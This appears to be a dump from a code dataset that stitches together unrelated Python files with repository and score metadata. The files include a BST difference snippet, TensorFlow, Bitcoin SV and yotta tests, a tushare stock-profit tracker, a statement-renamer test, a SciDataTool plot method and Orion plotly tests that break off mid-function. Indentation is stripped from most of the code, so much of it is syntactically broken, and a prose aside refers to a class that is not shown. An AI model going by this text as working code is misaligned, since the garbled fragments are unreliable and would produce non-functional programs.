# find the minimum difference between ajacent values O(n)
min_abs_diff = abs(value[0] - value[1])
for i in range(1, len(value) - 1):
diff = abs(value[i] - value[i + 1])
if diff < min_abs_diff:
min_abs_diff = diff
return min_abs_diff
| 3.796875 | 4 |
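The solution above collects every value and sorts it, which is O(n log n); because the tree is a BST, an in-order traversal already visits values in ascending order, so the same minimum can be found in one pass. A minimal alternative sketch reusing the TreeNode class above:

```python
class SolutionInorder:
    def getMinimumDifference(self, root: TreeNode) -> int:
        best, prev = float("inf"), None

        def inorder(node):
            nonlocal best, prev
            if node is None:
                return
            inorder(node.left)
            if prev is not None:
                best = min(best, node.val - prev)  # in-order values are ascending
            prev = node.val
            inorder(node.right)

        inorder(root)
        return best
```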
tensorflow/python/eager/remote_cloud_tpu_test.py | abhaikollara/tensorflow | 26 | 7814 | <reponame>abhaikollara/tensorflow<filename>tensorflow/python/eager/remote_cloud_tpu_test.py<gh_stars>10-100
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test that we can connect to a real Cloud TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
from absl.testing import absltest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.eager import context
from tensorflow.python.eager import remote
from tensorflow.python.tpu import tpu_strategy_util
FLAGS = flags.FLAGS
flags.DEFINE_string('tpu', '', 'Name of TPU to connect to.')
flags.DEFINE_string('project', None, 'Name of GCP project with TPU.')
flags.DEFINE_string('zone', None, 'Name of GCP zone with TPU.')
EXPECTED_DEVICES_PRE_CONNECT = [
'/job:localhost/replica:0/task:0/device:CPU:0',
'/job:localhost/replica:0/task:0/device:XLA_CPU:0'
]
EXPECTED_DEVICES_AFTER_CONNECT = [
'/job:localhost/replica:0/task:0/device:CPU:0',
'/job:localhost/replica:0/task:0/device:XLA_CPU:0',
'/job:worker/replica:0/task:0/device:CPU:0',
'/job:worker/replica:0/task:0/device:XLA_CPU:0',
'/job:worker/replica:0/task:0/device:TPU_SYSTEM:0',
'/job:worker/replica:0/task:0/device:TPU:0',
'/job:worker/replica:0/task:0/device:TPU:1',
'/job:worker/replica:0/task:0/device:TPU:2',
'/job:worker/replica:0/task:0/device:TPU:3',
'/job:worker/replica:0/task:0/device:TPU:4',
'/job:worker/replica:0/task:0/device:TPU:5',
'/job:worker/replica:0/task:0/device:TPU:6',
'/job:worker/replica:0/task:0/device:TPU:7',
]
class RemoteCloudTPUTest(absltest.TestCase):
"""Test that we can connect to a real Cloud TPU."""
def test_connect(self):
self.assertCountEqual(
EXPECTED_DEVICES_PRE_CONNECT,
context.list_devices())
resolver = tpu_cluster_resolver.TPUClusterResolver(
tpu=FLAGS.tpu, zone=FLAGS.zone, project=FLAGS.project
)
remote.connect_to_cluster(resolver)
self.assertCountEqual(
EXPECTED_DEVICES_AFTER_CONNECT,
context.list_devices())
tpu_strategy_util.initialize_tpu_system(resolver)
if __name__ == '__main__':
absltest.main()
| 1.820313 | 2 |
test/functional/bsv-blocksize-params.py | gbtn/bitcoin-sv-gbtn | 3 | 7815 | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Test that the blockmaxsize and excessiveblocksize parameters are also
settable via the bitcoin.conf file.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
from test_framework.cdefs import (ONE_MEGABYTE)
import os
class BSVBlockSizeParams(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.maxminedblocksize = 4 * ONE_MEGABYTE
self.maxblocksize = 16 * ONE_MEGABYTE
def setup_chain(self):
super().setup_chain()
with open(os.path.join(self.options.tmpdir + "/node0", "bitcoin.conf"), 'a', encoding='utf8') as f:
f.write("blockmaxsize=" + str(self.maxminedblocksize) + "\n")
f.write("excessiveblocksize=" + str(self.maxblocksize) + "\n")
def add_options(self, parser):
super().add_options(parser)
def run_test(self):
gires = self.nodes[0].getinfo()
assert_equal(gires["maxblocksize"], self.maxblocksize)
assert_equal(gires["maxminedblocksize"], self.maxminedblocksize)
if __name__ == '__main__':
BSVBlockSizeParams().main()
| 2.21875 | 2 |
yotta/test/cli/outdated.py | headlessme/yotta | 0 | 7816 | <reponame>headlessme/yotta
#!/usr/bin/env python
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import unittest
# internal modules:
from . import util
from . import cli
Test_Outdated = {
'module.json':'''{
"name": "test-outdated",
"version": "0.0.0",
"description": "Test yotta outdated",
"author": "<NAME> <<EMAIL>>",
"license": "Apache-2.0",
"dependencies":{
"test-testing-dummy": "*"
}
}''',
'source/foo.c':'''#include "stdio.h"
int foo(){
printf("foo!\\n");
return 7;
}''',
# test-testing-dummy v0.0.1 (a newer version is available from the registry,
# and will be installed by yt up)
'yotta_modules/test-testing-dummy/module.json':'''{
"name": "test-testing-dummy",
"version": "0.0.1",
"description": "Test yotta's compilation of tests.",
"author": "<NAME> <<EMAIL>>",
"license": "Apache-2.0"
}
'''
}
class TestCLIOutdated(unittest.TestCase):
def test_outdated(self):
path = util.writeTestFiles(Test_Outdated, True)
stdout, stderr, statuscode = cli.run(['-t', 'x86-linux-native', 'outdated'], cwd=path)
self.assertNotEqual(statuscode, 0)
self.assertIn('test-testing-dummy', stdout + stderr)
util.rmRf(path)
def test_notOutdated(self):
path = util.writeTestFiles(Test_Outdated, True)
stdout, stderr, statuscode = cli.run(['-t', 'x86-linux-native', 'up'], cwd=path)
self.assertEqual(statuscode, 0)
stdout, stderr, statuscode = cli.run(['-t', 'x86-linux-native', 'outdated'], cwd=path)
self.assertEqual(statuscode, 0)
self.assertNotIn('test-testing-dummy', stdout + stderr)
util.rmRf(path)
| 2.046875 | 2 |
geoposition/tests/urls.py | Starcross/django-geoposition | 0 | 7817 | <filename>geoposition/tests/urls.py
from django.urls import path, include
from django.contrib import admin
from example.views import poi_list
admin.autodiscover()
urlpatterns = [
path('', poi_list),
path('admin/', admin.site.urls),
]
| 1.835938 | 2 |
A_Stocker/Stocker.py | Allen1218/Python_Project_Interesting | 1 | 7818 | <reponame>Allen1218/Python_Project_Interesting<filename>A_Stocker/Stocker.py
import threading
import tushare as ts
import pandas as pd
import datetime
STOCK = {#'002594':[1,170.15], ## 比亚迪 / lots held, cost price
'601012':[11,99.9], ## 隆基股份
'002340':[12,8.72], ## 格林美
'603259':[1,141.7], ## 药明康德
'002346':[10,10.68], ## 柘中股份
#'600438':[9,42.96], ## 通威股份
#'002475':[3,59.51], ## 立讯精密
#'603308':[1,33.49], ## 应流股份
#'002415': [3, 66.40], ## 海康威视
# '600559':[3,35.3], ## 老白干
# '601100':[1, 114.5], ## 恒立液压
# '603466':[6, 22.40] ## 风语筑
}
TimerNum = 20.0 # s
Total = 0
# TODO
def get_all_price():
'''process all stock'''
stockCode = list(STOCK.keys())
df = ts.get_realtime_quotes(stockCode)
lp = list(STOCK.values())
stockNum = []
stockCostPrice = []
for i in range(len(lp)):
stockNum.append(lp[i][0])
stockCostPrice.append(lp[i][1])
df['num'] = stockNum
df['stockCostPrice'] = stockCostPrice
# 处理
# profit and lost ratio 盈亏率
plRatio = round((df['price'].astype(float) / df['stockCostPrice'] - 1)*100,2)
# profit and lost 盈亏
df['plRatio'] = plRatio
df['stockNum'] = stockNum
pl = round(df['plRatio'].astype(float) * df['stockNum'] * df['stockCostPrice'].astype(float),2)
df['pl'] = pl
    # today's rise/fall percentage
currentRF = round((df['price'].astype(float) / df['pre_close'].astype(float) - 1)*100,2)
df['currentRF'] = currentRF
df1 = df[[ 'open', 'price', 'stockCostPrice', 'plRatio', 'num','pl', 'currentRF','name']]
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
    pd.set_option('display.width', 180) # set display width (**important**)
pd.set_option('display.max_columns', 1000)
pd.set_option('display.width', 1000)
pd.set_option('display.max_colwidth', 1000)
sss = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f)")[:-4]
print('\n')
print("----------------" + sss +"------------------")
print(df1)
sum_int = round(df['pl'].sum(),2)
print("total profit and lost is " + sum_int.astype(str))
print('\n')
# df.to_csv('stock_data.csv', encoding='utf_8_sig', index=None)
global timer
timer = threading.Timer(TimerNum, get_all_price, [])
timer.start()
if __name__ == '__main__':
print(STOCK)
get_all_price()
timer = threading.Timer(TimerNum, get_all_price, [])
timer.start()
| 2.671875 | 3 |
tests/extractors/test_etrade.py | mkazin/StatementRenamer | 0 | 7819 | <filename>tests/extractors/test_etrade.py
from datetime import datetime
from statement_renamer.extractors.etrade import ETradeDateExtractor as EXTRACTOR_UNDER_TEST
from statement_renamer.extractors.factory import ExtractorFactory
TESTDATA = (
"""
PAGE 1 OF 6 February 1, 2019 - March 31, 2019AccountNumber:####-####AccountType:ROTH IRA
PAGE 5 OF 6Account Number: ####-####Statement Period : February 1, 2019 - March 31, 2019Account Type
TolearnmoreabouttheRSDAProgram,pleasereviewyourRSDAProgramCustomerAgreement,visitwww.etrade.com,orcallusat1-800-387-2331
"""
)
def test_monthly_statement():
extractor = EXTRACTOR_UNDER_TEST()
data = extractor.extract(TESTDATA)
new_name = extractor.rename(data)
assert data.get_start_date() == datetime(2019, 2, 1)
assert data.get_end_date() == datetime(2019, 3, 31)
assert new_name == '2019-03 E-Trade Statement.pdf'
def test_factory():
extractor = ExtractorFactory.get_matching_extractor(TESTDATA)
assert isinstance(extractor, EXTRACTOR_UNDER_TEST)
| 2.75 | 3 |
Estrutura_Decisao/who.py | M3nin0/supreme-broccoli | 0 | 7820 | <reponame>M3nin0/supreme-broccoli<gh_stars>0
prod1 = float(input("Insira o valor do produto A: "))
prod2 = float(input("Insira o valor do produto B: "))
prod3 = float(input("Insira o valor do produto C: "))
if prod1 < prod2 and prod1 < prod3:
print ("Escolha o produto A é o mais barato")
elif prod2 < prod1 and prod2 < prod3:
print ("Escolha o produto B é o mais barato")
elif prod3 < prod1 and prod3 < prod2:
print ("Escolha o produto C é o mais barato")
| 3.828125 | 4 |
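The comparison chain above prints nothing when two products tie for cheapest; an equivalent, shorter form keeps the prices in a dict and takes the minimum (ties resolve to the first key inserted):

```python
prices = {"A": prod1, "B": prod2, "C": prod3}
cheapest = min(prices, key=prices.get)
print("Choose product {}, it is the cheapest".format(cheapest))
```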
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/_api/v2/compat/v2/train/experimental/__init__.py | Lube-Project/ProgettoLube | 2 | 7821 | <reponame>Lube-Project/ProgettoLube
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.train.experimental namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.training.experimental.loss_scale import DynamicLossScale
from tensorflow.python.training.experimental.loss_scale import FixedLossScale
from tensorflow.python.training.experimental.loss_scale import LossScale
from tensorflow.python.training.experimental.mixed_precision import disable_mixed_precision_graph_rewrite
from tensorflow.python.training.experimental.mixed_precision import enable_mixed_precision_graph_rewrite
from tensorflow.python.training.tracking.python_state import PythonState
del _print_function
| 1.28125 | 1 |
SciDataTool/Methods/VectorField/plot_3D_Data.py | BenjaminGabet/SciDataTool | 0 | 7822 | <gh_stars>0
def plot_3D_Data(
self,
*arg_list,
is_norm=False,
unit="SI",
component_list=None,
save_path=None,
x_min=None,
x_max=None,
y_min=None,
y_max=None,
z_min=None,
z_max=None,
z_range=None,
is_auto_ticks=True,
is_auto_range=False,
is_2D_view=False,
is_same_size=False,
N_stem=100,
fig=None,
ax=None,
is_show_fig=None,
is_logscale_x=False,
is_logscale_y=False,
is_logscale_z=False,
thresh=0.02,
is_switch_axes=False,
colormap="RdBu_r",
win_title=None,
font_name="arial",
font_size_title=12,
font_size_label=10,
font_size_legend=8,
):
"""Plots a field as a function of time
Parameters
----------
self : Output
an Output object
Data_str : str
name of the Data Object to plot (e.g. "mag.Br")
*arg_list : list of str
arguments to specify which axes to plot
is_norm : bool
boolean indicating if the field must be normalized
unit : str
unit in which to plot the field
save_path : str
full path including folder, name and extension of the file to save if save_path is not None
x_min : float
minimum value for the x-axis
x_max : float
maximum value for the x-axis
y_min : float
minimum value for the y-axis
y_max : float
maximum value for the y-axis
z_min : float
minimum value for the z-axis
z_max : float
maximum value for the z-axis
is_auto_ticks : bool
in fft, adjust ticks to freqs (deactivate if too close)
is_auto_range : bool
in fft, display up to 1% of max
is_2D_view : bool
True to plot Data in xy plane and put z as colormap
is_same_size : bool
True to have all color blocks with same size in 2D view
N_stem : int
number of harmonics to plot (only for stem plots)
fig : Matplotlib.figure.Figure
existing figure to use if None create a new one
ax : Matplotlib.axes.Axes object
ax on which to plot the data
is_show_fig : bool
True to show figure after plot
is_logscale_x : bool
boolean indicating if the x-axis must be set in logarithmic scale
is_logscale_y : bool
boolean indicating if the y-axis must be set in logarithmic scale
is_logscale_z : bool
boolean indicating if the z-axis must be set in logarithmic scale
thresh : float
threshold for automatic fft ticks
is_switch_axes : bool
to switch x and y axes
"""
# Call the plot on each component
if component_list is None: # default: extract all components
component_list = self.components.keys()
for i, comp in enumerate(component_list):
if save_path is not None and len(component_list) > 1:
save_path_comp = (
save_path.split(".")[0] + "_" + comp + "." + save_path.split(".")[1]
)
else:
save_path_comp = save_path
self.components[comp].plot_3D_Data(
arg_list,
is_norm=is_norm,
unit=unit,
save_path=save_path_comp,
x_min=x_min,
x_max=x_max,
y_min=y_min,
y_max=y_max,
z_min=z_min,
z_max=z_max,
colormap=colormap,
is_auto_ticks=is_auto_ticks,
is_auto_range=is_auto_range,
is_2D_view=is_2D_view,
is_same_size=is_same_size,
N_stem=N_stem,
fig=fig,
ax=ax,
is_show_fig=is_show_fig,
is_logscale_x=is_logscale_x,
is_logscale_y=is_logscale_y,
is_logscale_z=is_logscale_z,
thresh=thresh,
is_switch_axes=is_switch_axes,
win_title=win_title,
font_name=font_name,
font_size_title=font_size_title,
font_size_label=font_size_label,
font_size_legend=font_size_legend,
)
| 2.609375 | 3 |
tests/unittests/plotting/test_plotly_backend.py | obilaniu/orion | 1 | 7823 | <reponame>obilaniu/orion<filename>tests/unittests/plotting/test_plotly_backend.py
"""Collection of tests for :mod:`orion.plotting.backend_plotly`."""
import copy
import numpy
import pandas
import plotly
import pytest
import orion.client
from orion.analysis.partial_dependency_utils import partial_dependency_grid
from orion.core.worker.experiment import Experiment
from orion.plotting.base import (
lpi,
parallel_coordinates,
partial_dependencies,
rankings,
regret,
regrets,
)
from orion.testing import create_experiment
from orion.testing.plotting import (
assert_lpi_plot,
assert_parallel_coordinates_plot,
assert_partial_dependencies_plot,
assert_rankings_plot,
assert_regret_plot,
assert_regrets_plot,
)
config = dict(
name="experiment-name",
space={"x": "uniform(0, 200)"},
metadata={
"user": "test-user",
"orion_version": "XYZ",
"VCS": {
"type": "git",
"is_dirty": False,
"HEAD_sha": "test",
"active_branch": None,
"diff_sha": "diff",
},
},
version=1,
pool_size=1,
max_trials=10,
working_dir="",
algorithms={"random": {"seed": 1}},
producer={"strategy": "NoParallelStrategy"},
)
trial_config = {
"experiment": 0,
"status": "completed",
"worker": None,
"start_time": None,
"end_time": None,
"heartbeat": None,
"results": [],
"params": [],
}
def mock_space(x="uniform(0, 6)", y="uniform(0, 3)", **kwargs):
"""Build a mocked space"""
mocked_config = copy.deepcopy(config)
mocked_config["space"] = {"x": x}
if y is not None:
mocked_config["space"]["y"] = y
mocked_config["space"].update(kwargs)
return mocked_config
def mock_experiment(
monkeypatch, ids=None, x=None, y=None, z=None, objectives=None, status=None
):
"""Mock experiment to_pandas to return given data (or default one)"""
if ids is None:
ids = ["a", "b", "c", "d"]
if x is None:
x = [0, 1, 2, 4]
if y is None:
y = [3, 2, 0, 1]
if objectives is None:
objectives = [0.1, 0.2, 0.3, 0.5]
if status is None:
status = ["completed", "completed", "completed", "completed"]
data = {
"id": ids,
"x": x,
"objective": objectives,
"status": status,
"suggested": ids,
}
if not isinstance(y, str):
data["y"] = y
if z is not None:
data["z"] = z
def to_pandas(self, with_evc_tree=False):
return pandas.DataFrame(data=data)
monkeypatch.setattr(Experiment, "to_pandas", to_pandas)
def mock_experiment_with_random_to_pandas(monkeypatch, status=None, unbalanced=False):
def to_pandas(self, with_evc_tree=False):
if unbalanced:
N = numpy.random.randint(5, 15)
elif status is not None:
N = len(status)
else:
N = 10
ids = numpy.arange(N)
x = numpy.random.normal(0, 0.1, size=N)
y = numpy.random.normal(0, 0.1, size=N)
objectives = numpy.random.normal(0, 0.1, size=N)
if status is None:
exp_status = ["completed"] * N
else:
exp_status = status
data = pandas.DataFrame(
data={
"id": ids,
"x": x,
"y": y,
"objective": objectives,
"status": exp_status,
"suggested": ids,
}
)
return data
monkeypatch.setattr(Experiment, "to_pandas", to_pandas)
def mock_model():
"""Return a mocked regressor which just predict iterated integers"""
class Model:
"""Mocked Regressor"""
def __init__(self):
self.i = 0
def predict(self, data):
"""Returns counting of predictions requested."""
data = numpy.arange(data.shape[0]) + self.i
self.i += data.shape[0]
return data # + numpy.random.normal(0, self.i, size=data.shape[0])
return Model()
def mock_train_regressor(monkeypatch, assert_model=None, assert_model_kwargs=None):
"""Mock the train_regressor to return the mocked regressor instead"""
def train_regressor(model, data, **kwargs):
"""Return the mocked model, and then model argument if requested"""
if assert_model:
assert model == assert_model
if assert_model_kwargs:
assert kwargs == assert_model_kwargs
return mock_model()
monkeypatch.setattr(
"orion.analysis.partial_dependency_utils.train_regressor", train_regressor
)
@pytest.mark.usefixtures("version_XYZ")
class TestLPI:
"""Tests the ``lpi()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
lpi(None)
def test_returns_plotly_object(self):
"""Tests that the plotly backend returns a plotly object"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self, monkeypatch):
"""Tests the layout of the plot"""
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
df = experiment.to_pandas()
assert df["x"].tolist() == [0, 1, 2, 4]
assert df["y"].tolist() == [3, 2, 0, 1]
assert df["objective"].tolist() == [0.1, 0.2, 0.3, 0.5]
assert_lpi_plot(plot, dims=["x", "y"])
def test_experiment_worker_as_parameter(self, monkeypatch):
"""Tests that ``Experiment`` is a valid parameter"""
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
experiment,
_,
):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y"])
def test_ignore_uncompleted_statuses(self, monkeypatch):
"""Tests that uncompleted statuses are ignored"""
config = mock_space()
mock_experiment(
monkeypatch,
ids="abcdefgh",
x=[0, 0, 0, 1, 0, 2, 0, 3],
y=[1, 0, 0, 2, 0, 0, 0, 3],
objectives=[0.1, None, None, 0.2, None, 0.3, None, 0.5],
status=[
"completed",
"new",
"reserved",
"completed",
"broken",
"completed",
"interrupted",
"completed",
],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment)
assert_lpi_plot(plot, dims=["x", "y"])
def test_multidim(self, monkeypatch):
"""Tests that dimensions with shape > 1 are flattened properly"""
config = mock_space(y="uniform(0, 3, shape=2)")
mock_experiment(monkeypatch, y=[[3, 3], [2, 3], [1, 2], [0, 3]])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y[0]", "y[1]"])
def test_fidelity(self, monkeypatch):
"""Tests that fidelity is supported"""
config = mock_space(y="fidelity(1, 200, base=3)")
mock_experiment(monkeypatch, y=[1, 3 ** 2, 1, 3 ** 4])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y"])
def test_categorical(self, monkeypatch):
"""Tests that categorical is supported"""
config = mock_space(y='choices(["a", "b", "c"])')
mock_experiment(monkeypatch, y=["c", "c", "a", "b"])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y"])
def test_categorical_multidim(self, monkeypatch):
"""Tests that multidim categorical is supported"""
config = mock_space(y='choices(["a", "b", "c"], shape=3)')
mock_experiment(
monkeypatch,
y=[["c", "b", "a"], ["c", "a", "c"], ["a", "b", "a"], ["c", "b", "b"]],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = lpi(experiment, model_kwargs=dict(random_state=1))
assert_lpi_plot(plot, dims=["x", "y[0]", "y[1]", "y[2]"])
@pytest.mark.usefixtures("version_XYZ")
class TestParallelCoordinates:
"""Tests the ``parallel_coordinates()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
parallel_coordinates(None)
def test_returns_plotly_object(self):
"""Tests that the plotly backend returns a plotly object"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = parallel_coordinates(experiment)
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self):
"""Tests the layout of the plot"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["x", "loss"])
def test_experiment_worker_as_parameter(self):
"""Tests that ``Experiment`` is a valid parameter"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
experiment,
_,
):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["x", "loss"])
def test_ignore_uncompleted_statuses(self):
"""Tests that uncompleted statuses are ignored"""
with create_experiment(config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["x", "loss"])
def test_unsupported_order_key(self):
"""Tests that unsupported order keys are rejected"""
with create_experiment(config, trial_config) as (_, _, experiment):
with pytest.raises(ValueError):
parallel_coordinates(experiment, order=["unsupported"])
def test_order_columns(self):
"""Tests that columns are sorted according to ``order``"""
multidim_config = copy.deepcopy(config)
for k in "yzutv":
multidim_config["space"][k] = "uniform(0, 200)"
with create_experiment(multidim_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment, order="vzyx")
assert_parallel_coordinates_plot(plot, order=["v", "z", "y", "x", "loss"])
def test_multidim(self):
"""Tests that dimensions with shape > 1 are flattened properly"""
multidim_config = copy.deepcopy(config)
multidim_config["space"]["y"] = "uniform(0, 200, shape=4)"
with create_experiment(multidim_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(
plot, order=["x", "y[0]", "y[1]", "y[2]", "y[3]", "loss"]
)
def test_fidelity(self):
"""Tests that fidelity is set to first column by default"""
fidelity_config = copy.deepcopy(config)
fidelity_config["space"]["z"] = "fidelity(1, 200, base=3)"
with create_experiment(fidelity_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["z", "x", "loss"])
def test_categorical(self):
"""Tests that categorical is supported"""
categorical_config = copy.deepcopy(config)
categorical_config["space"]["z"] = 'choices(["a", "b", "c"])'
with create_experiment(categorical_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(plot, order=["x", "z", "loss"])
def test_categorical_multidim(self):
"""Tests that multidim categorical is supported"""
categorical_config = copy.deepcopy(config)
categorical_config["space"]["z"] = 'choices(["a", "b", "c"], shape=3)'
with create_experiment(categorical_config, trial_config) as (_, _, experiment):
plot = parallel_coordinates(experiment)
assert_parallel_coordinates_plot(
plot, order=["x", "z[0]", "z[1]", "z[2]", "loss"]
)
@pytest.mark.usefixtures("version_XYZ")
class TestPartialDependencies:
"""Tests the ``partial_dependencies()`` method provided by the plotly backend"""
def test_returns_plotly_object(self, monkeypatch):
"""Tests that the plotly backend returns a plotly object"""
mock_train_regressor(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self, monkeypatch):
"""Tests the layout of the plot"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
df = experiment.to_pandas()
assert df["x"].tolist() == [0, 1, 2, 4]
assert df["y"].tolist() == [3, 2, 0, 1]
assert df["objective"].tolist() == [0.1, 0.2, 0.3, 0.5]
assert_partial_dependencies_plot(plot, dims=["x", "y"])
def test_ignore_uncompleted_statuses(self, monkeypatch):
"""Tests that uncompleted statuses are ignored"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(
monkeypatch,
ids="abcdefgh",
x=[0, 0, 0, 1, 0, 2, 0, 3],
y=[1, 0, 0, 2, 0, 0, 0, 3],
objectives=[0.1, None, None, 0.2, None, 0.3, None, 0.5],
status=[
"completed",
"new",
"reserved",
"completed",
"broken",
"completed",
"interrupted",
"completed",
],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(experiment, n_grid_points=5)
assert_partial_dependencies_plot(plot, dims=["x", "y"])
def test_multidim(self, monkeypatch):
"""Tests that dimensions with shape > 1 are flattened properly"""
mock_train_regressor(monkeypatch)
config = mock_space(y="uniform(0, 3, shape=2)")
mock_experiment(monkeypatch, y=[[3, 3], [2, 3], [1, 2], [0, 3]])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(plot, dims=["x", "y[0]", "y[1]"])
def test_fidelity(self, monkeypatch):
"""Tests that fidelity is supported"""
mock_train_regressor(monkeypatch)
config = mock_space(y="fidelity(1, 200, base=3)")
mock_experiment(monkeypatch, y=[1, 3 ** 2, 1, 3 ** 4])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(plot, dims=["x", "y"], log_dims=["y"])
def test_categorical(self, monkeypatch):
"""Tests that categorical is supported"""
mock_train_regressor(monkeypatch)
config = mock_space(y='choices(["a", "b", "c"])')
mock_experiment(monkeypatch, y=["c", "c", "a", "b"])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
# There is only 3 categories, so test must be adjusted accordingly.
assert_partial_dependencies_plot(
plot, dims=["x", "y"], n_grid_points={"x": 5, "y": 3}
)
def test_categorical_multidim(self, monkeypatch):
"""Tests that multidim categorical is supported"""
mock_train_regressor(monkeypatch)
config = mock_space(y='choices(["a", "b", "c"], shape=3)')
mock_experiment(
monkeypatch,
y=[["c", "b", "a"], ["c", "a", "c"], ["a", "b", "a"], ["c", "b", "b"]],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(
plot,
dims=["x", "y[0]", "y[1]", "y[2]"],
n_grid_points={"x": 5, "y[0]": 3, "y[1]": 3, "y[2]": 3},
)
def test_logarithmic_scales_first(self, monkeypatch):
"""Test that log dims are turn to log scale
Test first dim specifically because special xaxis name for first dim.
"""
mock_train_regressor(monkeypatch)
config = mock_space(x="loguniform(0.001, 1)", z="uniform(0, 1)")
mock_experiment(monkeypatch, x=[0.001, 0.1, 0.01, 1], z=[0, 0.1, 0.2, 0.5])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(
plot, dims=["x", "y", "z"], n_grid_points=5, log_dims=["x"]
)
def test_logarithmic_scales_any_dim(self, monkeypatch):
"""Test that log dims are turn to log scale"""
mock_train_regressor(monkeypatch)
config = mock_space(y="loguniform(0.001, 1)", z="uniform(0, 1)")
mock_experiment(monkeypatch, y=[0.001, 0.1, 0.01, 1], z=[0, 0.1, 0.2, 0.5])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(
plot, dims=["x", "y", "z"], n_grid_points=5, log_dims=["y"]
)
def test_int_logarithmic_scales(self, monkeypatch):
"""Test that int log dims are turn to log scale"""
mock_train_regressor(monkeypatch)
config = mock_space(y="loguniform(1, 1000, discrete=True)", z="uniform(0, 1)")
mock_experiment(monkeypatch, y=[1, 10, 100, 1000], z=[0, 0.1, 0.2, 0.5])
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(
plot, dims=["x", "y", "z"], n_grid_points=5, log_dims=["y"]
)
def test_one_param(self, monkeypatch):
